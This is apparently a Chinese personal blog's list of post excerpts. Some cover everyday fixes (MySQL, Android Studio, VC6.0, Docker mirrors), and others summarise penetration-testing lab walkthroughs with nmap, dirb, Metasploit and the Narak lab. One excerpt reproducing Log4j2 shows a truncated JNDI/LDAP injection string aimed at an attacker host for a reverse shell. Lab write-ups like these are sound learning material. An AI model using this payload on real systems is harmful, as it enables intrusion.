xiong2023

摘要： 【问题】 【自言自语】没乱整啥呀，怎么突然连不上了？先上网看看，看了几篇，好麻烦，感觉不太符合我这个问题症状。先按自己的感觉试试吧。 【解决】 Win+r后在“运行”窗口输入“services.msc”,找到mysql，重启或启动它。 阅读全文

摘要： 新手小白在Android Studio上运行程序的时候遇到俩问题，通过在网上各种找解决方法，最终解决了（然后就想起来继续写博客这件事儿了）。 【第一个问题】关于“Error running'app':No target device found”。就是它找不到设备（虚拟机或者真机），所以配置虚拟机就 阅读全文

摘要： 上机实验要求用到VC++，为了写作业方便，在自己电脑下载了一个。VC6.0能够在XP下很好的运行，不需要额外的配置，但是在win10、win8下需要修改兼容性。 下载完成后鼠标右击桌面图标，选择“属性”： 修改兼容性： 阅读全文

摘要： （1）查看攻击机ip，nmap扫描相应网段 （2）没扫出来什么，加参数继续扫， ，-A 扫描的常规端口（1000以内）； -p 扫描全端口，-sV 扫描端口对应的服务，-O 扫描靶机的系统版本， 【80端口映射到1898端口，访问1898】 （3）访问一下1898端口， （4）dirb扫描http： 阅读全文

摘要： 做narak靶场的时候遇到下面问题：WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!ssh连接报错，解决办法：原因：可能是因为上一层连接是没连接上，就把kali关闭了，然后靶机出现了一个know_hosts.old文件，如果要再次连接，需要删除这文件参 阅读全文

摘要： 需要拿到两个flag（user.txt 和 root.txt）(1)net模式下启动narak靶场:(2)开启kali，查看ip地址，nmap扫描到一个地址：（3）访问扫描到的128地址，查看网页源代码：没有发现什么有用的。（3）dirb扫描，访问http：//192.168.88.128/webd 阅读全文

摘要： （1）查看本机ip，nmap扫描（2）工具Metasplotit（2）search命令+上面扫描到的版本号，发现有可用的exploit（3）use命令（4）show options 查看参数，设置好参数后，再设置一下payload，然后run（5）获取到root权限，攻击完成。 阅读全文

摘要： 【1】漏洞原理：Log4j2默认支持解析ldap/rmi协议(只要打印的日志中包括ldap/rmi协议 即可)【2】复现：（1）启动靶场环境：（2）反弹shell：http://靶机ip:8983/solr/admin/cores?action=${jndi:ldap://攻击机ip:1389/Ba 阅读全文

摘要： （1）docker search bwapp，（2）docker pull 镜像名称，（3）启动容器，（4）浏览器中访问http://本机ip：端口/login.php：会出现提示：（5）访问http://本机ip：端口/install.php做数据库初始化操作，（6）重新登录， 阅读全文

摘要： docker-compose up 拉取环境出现如下报错，看到Timeout以为是网络不好，其实不然，用vim /etc/docker/daemon.json添加新的镜像地址， 再次docker-compose的时候就顺利进行了。 阅读全文